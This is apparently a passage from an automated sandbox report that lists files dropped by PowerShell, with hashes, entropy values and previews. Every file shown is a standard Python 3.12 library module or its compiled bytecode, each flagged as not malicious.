                                                                                                    Preview:""" codecs -- Python Codec Registry, API and helpers.......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""....import builtins..import sys....### Registry and builtin stateless codec functions....try:.. from _codecs import *..except ImportError as why:.. raise SystemError('Failed to load the builtin codecs: %s' % why)....__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",.. "BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",.. "BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",.. "BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",.. "CodecInfo", "Codec", "IncrementalEncoder", "IncrementalDecoder",.. "StreamReader", "StreamWriter",.. "StreamReaderWriter", "StreamRecoder",.. "getencoder", "getdecoder", "getincrementalencoder",.. "getincrementaldecoder", "getreader", "getwriter",.. "encode", "decode", "iter
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6069
                                                                                                    Entropy (8bit):4.697072368349036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:CH1OT+d3PVtx6zAg5x4Y0s2WbFrSNRa/y4DrY1lODbCMPikrv59S4RzC4Xovtr0o:sOOPfqASx49WbFrORa/yCYODrit4RzCl
                                                                                                    MD5:62AC1E4162F4E5BD48D25DA8307BC46B
                                                                                                    SHA1:82A983BBBFDBAC1EC8F65ED51FD00C1E2729C3D7
                                                                                                    SHA-256:62F6D6D926C2DC4F3B7AA7ABD2AEB025B5DE716A53F590B641EF82B00A810B50
                                                                                                    SHA-512:6246CC8EA37909A2148581816EF57F21B1396CEBB6AC734365D30DFF2CFD0458353D31CEA5128F216456BD3F3CCE4654F4212B407DBCE40EF53223251E3B9608
                                                                                                    Malicious:false
                                                                                                    Preview:r"""Utilities to compile possibly incomplete Python source code.....This module provides two interfaces, broadly similar to the builtin..function compile(), which take program text, a filename and a 'mode'..and:....- Return code object if the command is complete and valid..- Return None if the command is incomplete..- Raise SyntaxError, ValueError or OverflowError if the command is a.. syntax error (OverflowError and ValueError can be produced by.. malformed literals).....The two interfaces are:....compile_command(source, filename, symbol):.... Compiles a single command in the manner described above.....CommandCompiler():.... Instances of this class have __call__ methods identical in.. signature to compile_command; the difference is that if the.. instance compiles program text containing a __future__ statement,.. the instance 'remembers' and compiles all subsequent program texts.. with the statement in force.....The module also provides another class:....Compile():.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53970
                                                                                                    Entropy (8bit):4.499375019885922
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:aCI43OwctD9O9FtPxdKtDXo0a4vpHK10cJXPxpN6IKhjtFo:XI43OwctBOgJq
                                                                                                    MD5:251382C3E093C311A3E83651CBDBCC11
                                                                                                    SHA1:28A9DE0E827B37280C44684F59FD3FCC54E3EABD
                                                                                                    SHA-256:1EB4C4445883FD706016ACA377D9E5C378BAC0412D7C9B20F71CAE695D6BB656
                                                                                                    SHA-512:010B171F3DD0AA676261A3432FE392568F364FE43C6CB4615B641994EB2FAF48CAABF3080EDF3C00A1A65FC43748CAAF692A3C7D1311B6C90825FFCE185162B0
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:'''This module implements specialized container datatypes providing..alternatives to Python's general purpose built-in containers, dict,..list, set, and tuple.....* namedtuple factory function for creating tuple subclasses with named fields..* deque list-like container with fast appends and pops on either end..* ChainMap dict-like class for creating a single view of multiple mappings..* Counter dict subclass for counting hashable objects..* OrderedDict dict subclass that remembers the order entries were added..* defaultdict dict subclass that calls a factory function to supply missing values..* UserDict wrapper around dictionary objects for easier dict subclassing..* UserList wrapper around list objects for easier list subclassing..* UserString wrapper around string objects for easier string subclassing....'''....__all__ = [.. 'ChainMap',.. 'Counter',.. 'OrderedDict',.. 'UserDict',.. 'UserList',.. 'UserString',.. 'defaultdict',.. 'd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73128
                                                                                                    Entropy (8bit):4.991248012037406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:Rq/j9e0macPTHWTDRBPoYI+gfbY0A3kckNVQdqfRmO/8hDyPxz:kg0mvTExqf4O/8Gxz
                                                                                                    MD5:5DED9AEBC5BB1B2B7D27443E6E0A9437
                                                                                                    SHA1:32C060890716C8ACED35C92E2E7BA23199A2FD7A
                                                                                                    SHA-256:8589A1421368D7B06C7FF575007D85B5CADE092062F814B7AA4873C2BEADE5BC
                                                                                                    SHA-512:7509EF1CFC98629FB5916A2913225098D4A84ECD7BB2CAC13DF80486DC11B478D1E605B1E2BF3B9DF89364049DE1289269B48B389313937786BE985088700AF5
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z...e.j8..................j;..................e.............d.d.l.m.Z.....d.d.l.m Z ....G.d...d.e.jB..........................Z"..G.d...d.e.jF..........................Z$..G.d...d.e.jJ..........................Z&..G.d...d.e'........Z(..G.d...d.e)........Z*..d.d.l.m*Z*....d.d.l.m+Z+..d.d.d.d...d...Z,d...Z-..d.d l.m-Z-....G.d!..d"e)........Z...G.d#..d$e.j^..........................Z0..G.d%..d&e.j^..........................Z1..G.d'..d(e.j8..........................Z2..G.d)..d*e.jf..........................Z4y.#.e.$.r...Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.#.e.$.r...d...Z+Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.)+a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):288
                                                                                                    Entropy (8bit):5.007897507311768
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:h4U/sAL6VvkGY/laE+MdF/HjEO/n6un23d6otGE2anI:hB/s56j+E5/6XIiG9anI
                                                                                                    MD5:1C98064833D6F056B53B400D92BED716
                                                                                                    SHA1:2EAE420B637FF89B8C7D9F3C1E724F4344045335
                                                                                                    SHA-256:C8B9AD9008DF4081C2DC684F8920AD821B49C106EB4D642C1D0A77E49A8DF857
                                                                                                    SHA-512:B7466F0BE0A1D173E82057FA55F9BE68FCF079B37E793DA10ED8F2B5382DB3A9F85D9760C5E2FFA9785DCC8186CEC92D7D86EB7C6820AABD5F6AC2B06444CBDC
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fz.........................&.....d.d.l.....d.d.l.m.Z...d.d.l.m.Z...y.)......)...*)...__all__)..._CallableGenericAliasN)..._collections_abcr....r............MC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\collections\abc.py..<module>r........s..............$..2r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):122
                                                                                                    Entropy (8bit):4.154562766131627
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:16dgXGviibaIF6dgXGvisxCK46dgXGviYHEubWyn:14gX5TIF4gX5GS4gX5AE/y
                                                                                                    MD5:BEF5A0AF889CBE656D8F36952B66D86A
                                                                                                    SHA1:F58423BE30ACEC27E1B47617F47D2B6C94F01A72
                                                                                                    SHA-256:7AD86878712FC6682863F12208F4CED5DAF2DD82B6FF5ED58207DE29D0EFA410
                                                                                                    SHA-512:9DD60F99DA7FCAABE8CE08AB012CD507A98EE6E47DDA4A4E462CEB57DB16653B97B21D1DF1436DCCEDB1CD4B59433CECB697BCC3E031B52585F67C8454DB487D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:from _collections_abc import *..from _collections_abc import __all__..from _collections_abc import _CallableGenericAlias..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4228
                                                                                                    Entropy (8bit):4.939538851329808
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:DuOeR5U4DSJVq+XZuNtryth8ThWXZi6IX2:DuXPUyehZk1yQhUZMX2
                                                                                                    MD5:F55DB067C4044A9A2B51EABE75C981F8
                                                                                                    SHA1:A5B508A8245802C3F8BA917DFE2127B8E29CC17E
                                                                                                    SHA-256:B5F4CA4DC00978554E19E0E577B4C6CF8D2BBCB3D475258C8796BF8CC37CB8D2
                                                                                                    SHA-512:50C1233A4E285EC1F95C3BCB446A6CC02252FA2C525BBA17710AF3CEE1A9F81C84FE4F0C8CED868C84F2604C0D20AD4BAC8ED1A755B0892E9B1DE891A35AE7E3
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Conversion functions between RGB and other color systems.....This modules provides two functions for each color system ABC:.... rgb_to_abc(r, g, b) --> a, b, c.. abc_to_rgb(a, b, c) --> r, g, b....All inputs and outputs are triples of floats in the range [0.0...1.0]..(with the exception of I and Q, which covers a slightly larger range)...Inputs outside the valid range may cause exceptions or invalid outputs.....Supported color systems:..RGB: Red, Green, Blue components..YIQ: Luminance, Chrominance (used by composite video signals)..HLS: Hue, Luminance, Saturation..HSV: Hue, Saturation, Value.."""....# References:..# http://en.wikipedia.org/wiki/YIQ..# http://en.wikipedia.org/wiki/HLS_color_space..# http://en.wikipedia.org/wiki/HSV_color_space....__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",.. "rgb_to_hsv","hsv_to_rgb"]....# Some floating point constants....ONE_THIRD = 1.0/3.0..ONE_SIXTH = 1.0/6.0..TWO_THIRD = 2.0/3.0....# YIQ: used by composite video si
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20976
                                                                                                    Entropy (8bit):4.162846869835051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:kFvpRRcNykbCAH86PekbUH1B61Oep2QiNFIboUUW6cUu:kFRRRcBVHpP3YH18RfEiboeX
                                                                                                    MD5:B3E790B4F84AC51093D8119D163EFBBC
                                                                                                    SHA1:BE422C812A2172072B1586DC08B16F788CF9A044
                                                                                                    SHA-256:5D52C02C00A7B58E5875F1EADDDED627919AE134F3927688167D634FADE5FE2E
                                                                                                    SHA-512:8E1E99672E790B765BBB5ED74439AA61AE792BC4B54A5063A8BE328D55016E54084548890BCB8519DD4802E0001A4660699D306C05B330D6BE7E0145A7FAD0E2
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Module/script to byte-compile all .py files to .pyc files.....When called as a script with arguments, this compiles the directories..given as arguments recursively; the -l option prevents it from..recursing into directories.....Without arguments, it compiles all modules on sys.path, without..recursing into subdirectories. (Even though it should do so for..packages -- for now, you'll have to deal with packages separately.)....See module py_compile for details of the actual byte-compilation..."""..import os..import sys..import importlib.util..import py_compile..import struct..import filecmp....from functools import partial..from pathlib import Path....__all__ = ["compile_dir","compile_file","compile_path"]....def _walk_dir(dir, maxlevels, quiet=0):.. if quiet < 2 and isinstance(dir, os.PathLike):.. dir = os.fspath(dir).. if not quiet:.. print('Listing {!r}...'.format(dir)).. try:.. names = os.listdir(dir).. except OSError:.. if quiet < 2:..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):39
                                                                                                    Entropy (8bit):4.2336188853070205
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:SbF8tHyxVWSov:SbFUHoVjov
                                                                                                    MD5:F8259102DFC36D919A899CDB8FDE48CE
                                                                                                    SHA1:4510C766809835DAB814C25C2223009EB33E633A
                                                                                                    SHA-256:52069AEEFB58DAD898781D8BDE183FFDA18FAAE11F17ACE8CE83368CAB863FB1
                                                                                                    SHA-512:A77C8A67C95D49E353F903E3BD394E343C0DFA633DCFFBFD7C1B34D5E1BDFB9A372ECE71360812E44C5C5BADFA0FC81387A6F65F96616D6307083C2B3BB0213F
                                                                                                    Malicious:false
                                                                                                    Preview:# This directory is a Python package...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):178
                                                                                                    Entropy (8bit):4.684993303702269
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:onwllllGlllVO8l4+O/vh4E2J51X6rSEguIiwIaQHtgem/l:htctVne9n23d6CIaatgem/l
                                                                                                    MD5:FD4925A3BDBFD0C4B5A1DB28BDF7AA48
                                                                                                    SHA1:3D567863EABA6611BF5F6CFC677DE6769E756369
                                                                                                    SHA-256:463477DF48183DDF8B6550597620D11CD43A5E8F74E171364E1BB6BA7B609339
                                                                                                    SHA-512:03784133E6A24FFF60D1D9F6E61E422E1D4CD79F831942363BAA983BCD5CC2D5C71930D04E205A68C005EB36819E537E20D54C9FE40A81D5AE9E5C8556337836
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f'...............................y.).N..r..........QC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\concurrent\__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1611
                                                                                                    Entropy (8bit):4.244150085152504
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:QRFwLH5TbpZfLXA3TN9cf7Y961rTR0wMs8ShahNEmfh1GLurEX:kC5XjKK4QrTR05s8Sha7lfbGLuS
                                                                                                    MD5:9B917BFF8EEA8F6CF7BB2F16043D0322
                                                                                                    SHA1:D86064BBEC9785BF7C45333DB80142510D5AE2BD
                                                                                                    SHA-256:28C2BDE9FF483CE03263B3874EE04BA1C80B18BA5F05871B4AD0BF7AEC1A322F
                                                                                                    SHA-512:553D7F674B26A9F88FE5B10D2C7E19FE7B9E00999F5A9E8FB3ACA3E2307E77B4A7751642401AA1A26DC030AA10F69B4235901E1F724DEB52720D3D5FD7E9A40F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Execute computations asynchronously using threads or processes."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures._base import (FIRST_COMPLETED,.. FIRST_EXCEPTION,.. ALL_COMPLETED,.. CancelledError,.. TimeoutError,.. InvalidStateError,.. BrokenExecutor,.. Future,.. Executor,.. wait,.. as_completed)....__all__ = (.. 'FIRST_COMPLETED',.. 'FIRST_EXCEPTION',.. 'ALL_COMPLETED',.. 'CancelledError',.. 'TimeoutError',.. 'BrokenExecutor',.. 'Future',.. 'Executor',..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1289
                                                                                                    Entropy (8bit):5.499520275051632
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hylmVXmMM5OJ8IQr5sAXhq3Wq/NbNZ9M76Fgj1dDsHOb8Eii+OP:kgk5IgsAXh9q/rMmFgj1dWB7qP
                                                                                                    MD5:35D3DBD1E0161C3BB5DC36B56E66142B
                                                                                                    SHA1:4B79E30CB083B89D2BDAE9DA5197F250FED0337F
                                                                                                    SHA-256:6D1CEBF148CAC5DA1178BD9095FF8298F2C8F4F1B57B17F914C871CCD6DE90CB
                                                                                                    SHA-512:A84E1205BCF0226C1C528BCA5C8999F71694162D44146B78B5716B06A684B7FDDFE73AF53746FA074B39B305B631D96B837C98B883222EDE26AC40B37EE64E6D
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fK.........................P.....d.Z.d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.Z.d...Z.d...Z.y.).z?Execute computations asynchronously using threads or processes.z"Brian Quinlan (brian@sweetapp.com).....)...FIRST_COMPLETED..FIRST_EXCEPTION..ALL_COMPLETED..CancelledError..TimeoutError..InvalidStateError..BrokenExecutor..Future..Executor..wait..as_completed).r....r....r....r....r....r....r....r....r....r......ProcessPoolExecutor..ThreadPoolExecutorc...........................t.........d.z...S.).N)...__author__..__doc__)...__all__........YC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\concurrent\futures\__init__.py..__dir__r....$...s..................r....c.....................h.....|.d.k(..r.d.d.l.m.}...|.a.|.S.|.d.k(..r.d.d.l.m.}...|.a.|.S.t.........d.t...........d.|...............).Nr.........).r....r....).r....z.module z. has no attribute )...processr......threadr......AttributeError..__name__)...name..pe..tes.... r......__getattr__r!...(...sK.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32227
                                                                                                    Entropy (8bit):5.183819857423344
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:h98g4R6U90jYrJe9f5z2Y4fxMi/NL9ARxieZq1xm0AjTbJgxGPsF5xx4i:h9urJ2xSY4f2sN2RxRq1xm0AjTexEgtt
                                                                                                    MD5:C24FE840A8D31B40C7A6D6D8002872B1
                                                                                                    SHA1:B074E83FA32CA0555CC4AC08C3EC102CF85DC597
                                                                                                    SHA-256:D610F1546497604ADA546D26BE7CA7FE716D288B2DBA24D0D31462B5A7B24851
                                                                                                    SHA-512:FCC0AE710F4DDF41AFEB0AB19B03A6D036711E157E252376D764C35E4498E5CE9C5739124B40DC4976F34D6439651E3817FB52F4F5E7AA0E042D1901940FB99A
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.[..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.e.e.e.e.g.Z.e.d.e.d.e.d.e.d.e.d.i.Z...e.j"..................d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.e.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d e.........Z.d!..Z.d"..Z.d.d#..Z ..e.jB..................d$d%........Z"d.e.f.d&..Z#d.d'..Z$..G.d(..d)e.........Z%..G.d*..d+e.........Z&..G.d,..d-e'........Z(y.)/z"Brian Quinlan (brian@sweetapp.com).....N..FIRST_COMPLETED..FIRST_EXCEPTION..ALL_COMPLETED.._AS_COMPLETED..PENDING..RUNNING..CANCELLED..CANCELLED_AND_NOTIFIED..FINISHED..pending..running..cancelled..finishedz.concurrent.futuresc...........................e.Z.d.Z.d.Z.y.)...Errorz-Base class for all future-related exceptions.N....__name__..__module__..__qualname__..__doc__........VC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\concurrent\futures\_base.pyr....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23487
                                                                                                    Entropy (8bit):4.468492667420992
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:IF2fpqHFF4MIEh8F60aoM0fSvPSmP049u35sBwwtJhkff5avYV:UrvjI7FmCSSms49u35sBwwtJhkHJ
                                                                                                    MD5:26554F86CAD8AD806F4D2A1E7ED23814
                                                                                                    SHA1:9355AE43D5E6071BFC509C799F686E180C91E10D
                                                                                                    SHA-256:A5A450B5CCF2BC5ABF458BE32C7B2EB4E26C02C3D504EEF0E0682B5CFCFC6F52
                                                                                                    SHA-512:C22154DEE0C8E7A45F7A0F748B277FF69137FA9A9F0A8E921F142A80336F6AA411560DE442D0C38C025D9A486D0902C59C72F3DA77696808D9670282160E9561
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement.....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....import collections..import logging..import threading..import time..import types....FIRST_COMPLETED = 'FIRST_COMPLETED'..FIRST_EXCEPTION = 'FIRST_EXCEPTION'..ALL_COMPLETED = 'ALL_COMPLETED'.._AS_COMPLETED = '_AS_COMPLETED'....# Possible future states (for internal use by the futures package)...PENDING = 'PENDING'..RUNNING = 'RUNNING'..# The future was cancelled by the user.....CANCELLED = 'CANCELLED'..# ...and _Waiter.add_cancelled() was called by a worker...CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'..FINISHED = 'FINISHED'...._FUTURE_STATES = [.. PENDING,.. RUNNING,.. CANCELLED,.. CANCELLED_AND_NOTIFIED,.. FINISHED..]...._STATE_TO_DESCRIPTION_MAP = {.. PENDING: "pending",.. RUNNING: "running",.. CANCELLED: "cancelled",.. CANCELLED_AND_NOTIFIED: "cancelled",.. FINISHED: "finished"..}....# Logger
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37235
                                                                                                    Entropy (8bit):4.413288572976603
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Nf/K3m9sLuaJt7Z6sZ2lp/Q8hsOi/c6H0jXF5pNONrH+hBUM:NnK3m9guy0Hi/OpbuOh
                                                                                                    MD5:13415F1B7520BEF5C54F683587CCBD5E
                                                                                                    SHA1:792240CE53478DDE6A29D4E8371AB69ADB57EB63
                                                                                                    SHA-256:4689ED6903089F2637C60BD50FE48D1F40F54A831DF8376C9EB7FEDEAB1361F2
                                                                                                    SHA-512:A88979B87184BF2C2AE6558DA83A740EA389B0CD225FD6B1C273CB93DFCA9016DBDC3B68896D419D56C156459D877830007297A267B447D676F2D0281149520C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ProcessPoolExecutor.....The following diagram and text describe the data-flow through the system:....|======================= In-process =====================|== Out-of-process ==|....+----------+ +----------+ +--------+ +-----------+ +---------+..| | => | Work Ids | | | | Call Q | | Process |..| | +----------+ | | +-----------+ | Pool |..| | | ... | | | | ... | +---------+..| | | 6 | => | | => | 5, call() | => | |..| | | 7 | | | | ... | | |..| Process | | ... | | Local | +-----------+ | Process |..| Pool | +----------+ | Worker | | #1..n |..| Executor | | Thread |
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9123
                                                                                                    Entropy (8bit):4.3331109272598995
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:NVFRR//hda27aGhSoL/UDLWdLNEWjvb/DHjbbpU+izS9ek3/8N1x:NVFRb8DLWdLNvvb/npQ8a
                                                                                                    MD5:18CE5D5779570B0C979B974B2EFF31B5
                                                                                                    SHA1:F0D3DB82C4F9A4E9AFB068082344FC9EA925A9DA
                                                                                                    SHA-256:FC15ADBE6B366E0142CA395F4CE16D241FEF2786516A9B3AD60E5A1B72555540
                                                                                                    SHA-512:F8BBA1EB3BB47B50FC187F2D53F14AB1E0EAAABE2BFEDC53C6D0CC76DF4E4D68C6A31844B07A04DBBB28954828F0627A15E17756BA78056EE09968AB58ED1C90
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ThreadPoolExecutor."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures import _base..import itertools..import queue..import threading..import types..import weakref..import os......_threads_queues = weakref.WeakKeyDictionary().._shutdown = False..# Lock that ensures that new workers are not created while the interpreter is..# shutting down. Must be held while mutating _threads_queues and _shutdown..._global_shutdown_lock = threading.Lock()....def _python_exit():.. global _shutdown.. with _global_shutdown_lock:.. _shutdown = True.. items = list(_threads_queues.items()).. for t, q in items:.. q.put(None).. for t, q in items:.. t.join()....# Register for `_python_exit()` to be called just before joining all..# non-daemon threads. This is used instead of `atexit.register()` for..# compatibility with subint
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55122
                                                                                                    Entropy (8bit):4.344869589718126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:bBBEAmz8Ytkkp2NpD3VCuDkG02ep1WpYp4xGenkn2RP9g2p:bBBEAmz8Ytkjh3P9Jp
                                                                                                    MD5:460C752AAB8A6895955A2D0CE1CA14F6
                                                                                                    SHA1:77AC6D1C9112A903E9061F8EFB2FE464A8F3290C
                                                                                                    SHA-256:899CF66AD2E7F035F0752DAD3D42E1B186A5F2B8B819AC3F625FC894937FF58B
                                                                                                    SHA-512:2EBCC54B5EEDAB0CFC794CAD72BB2E1FF7C0F8BC7F0F1BA50222716D324683EDC07404E3A35E3CE8AA66F4BDA026C7CB501872C1D08A6A0884043C8CB0232822
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Configuration file parser.....A configuration file consists of sections, lead by a "[section]" header,..and followed by "name: value" entries, with continuations and such in..the style of RFC 822.....Intrinsic defaults can be specified by passing them into the..ConfigParser constructor as a dictionary.....class:....ConfigParser -- responsible for parsing a list of.. configuration files, and managing the parsed database..... methods:.... __init__(defaults=None, dict_type=_default_dict, allow_no_value=False,.. delimiters=('=', ':'), comment_prefixes=('#', ';'),.. inline_comment_prefixes=None, strict=True,.. empty_lines_in_values=True, default_section='DEFAULT',.. interpolation=<unset>, converters=<unset>):.... Create the parser. When `defaults` is given, it is initialized into the.. dictionary or intrinsic defaults. The keys must be strings, the values.. must be appropriate for %()s string in
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28437
                                                                                                    Entropy (8bit):4.350013505830429
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ArqxlsXri4ULtYBNcBOLUZfpqW9rz4ONszCAthtv6LDrxzCD:AexlfYBNcBicpqQQOginS
                                                                                                    MD5:E73CF7B338173F1994E840FC6AB24684
                                                                                                    SHA1:E0CF23D53654914EC6A781778BA2096FF1FB5657
                                                                                                    SHA-256:A53B1DB774F19C6B1E4320C2BC64058C49E3FBA58B20B9C1158E5A8D02069890
                                                                                                    SHA-512:B343DEB299C74C33821A2E865DC2D8F2F2985E214CD7D0E13FCF751E987FD8AD26527CEDCBA3885BE8D2B4EA8A4971FACF3073F41153A60614A72EA4FD70B25C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Utilities for with-statement contexts. See PEP 343."""..import abc..import os..import sys..import _collections_abc..from collections import deque..from functools import wraps..from types import MethodType, GenericAlias....__all__ = ["asynccontextmanager", "contextmanager", "closing", "nullcontext",.. "AbstractContextManager", "AbstractAsyncContextManager",.. "AsyncExitStack", "ContextDecorator", "ExitStack",.. "redirect_stdout", "redirect_stderr", "suppress", "aclosing",.. "chdir"]......class AbstractContextManager(abc.ABC):.... """An abstract base class for context managers.""".... __class_getitem__ = classmethod(GenericAlias).... def __enter__(self):.. """Return `self` upon entering the runtime context.""".. return self.... @abc.abstractmethod.. def __exit__(self, exc_type, exc_value, traceback):.. """Raise any exception triggered within the runtime context.""".. return None.... @classmethod..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):133
                                                                                                    Entropy (8bit):4.404091567342511
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:16dWRIXJ7LRAuKLRAM174adR8iDFoNFH9LmduQ26GKadR6n:14WI57LRERHNT8iD6HaMQEpT6
                                                                                                    MD5:031F54940ABDF481926457972FD90E0F
                                                                                                    SHA1:75689CDC1D790A7BC71E507903A00882DB6B652A
